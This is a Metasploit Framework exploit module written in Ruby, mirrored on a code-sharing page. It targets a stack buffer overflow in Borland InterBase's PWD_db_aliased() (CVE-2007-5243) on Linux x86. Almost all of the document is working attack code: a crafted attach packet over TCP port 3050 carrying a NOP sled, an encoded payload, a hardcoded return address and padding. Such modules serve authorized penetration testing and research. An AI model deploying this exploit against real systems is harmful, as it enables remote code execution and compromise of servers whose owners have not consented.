Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/misc/ib_pwd_db_aliased.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'Borland InterBase PWD_db_aliased() Buffer Overflow',

16
        'Description'	=> %q{

17
          This module exploits a stack buffer overflow in Borland InterBase

18
          by sending a specially crafted attach request.

19
        },

20
        'Author' => [

21
          'Ramon de C Valle',

22
          'Adriano Lima <adriano[at]risesecurity.org>',

23
        ],

24
        'Arch'	=> ARCH_X86,

25
        'Platform'	=> 'linux',

26
        'References' => [

27
          [ 'CVE', '2007-5243' ],

28
          [ 'OSVDB', '38607' ],

29
          [ 'BID', '25917' ],

30
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],

31
        ],

32
        'Privileged'	=> true,

33
        'License'	=> MSF_LICENSE,

34
        'Payload' => {

35
          'Space' => 512,

36
          'BadChars' => "\x00\x2f\x3a\x40\x5c",

37
        },

38
        'Targets' => [

39
          # 0x0804cbe4 pop esi; pop ebp; ret

40
          [

41
            'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',

42
            { 'Ret' => 0x0804cbe4 }

43
          ],

44
        ],

45
        'DefaultTarget'	=> 0,

46
        'DisclosureDate' => '2007-10-03',

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        Opt::RPORT(3050)

58
      ],

59
      self.class

60
    )

61
  end

62


63
  def exploit

64
    connect

65


66
    # Attach database

67
    op_attach = 19

68


69
    length = 1152

70
    remainder = length.remainder(4)

71
    padding = 0

72


73
    if remainder > 0

74
      padding = (4 - remainder)

75
    end

76


77
    buf = ''

78


79
    # Operation/packet type

80
    buf << [op_attach].pack('N')

81


82
    # Id

83
    buf << [0].pack('N')

84


85
    # Length

86
    buf << [length].pack('N')

87


88
    # It will return into this nop block

89
    buf << make_nops(length - payload.encoded.length - 4)

90


91
    # Payload

92
    buf << payload.encoded

93


94
    # Target

95
    buf << [target.ret].pack('V')

96


97
    # Padding

98
    buf << "\x00" * padding

99


100
    # Length

101
    buf << [1024].pack('N')

102


103
    # Random alpha data

104
    buf << rand_text_alpha(1024)

105


106
    sock.put(buf)

107


108
    handler

109
  end

110
end

111


112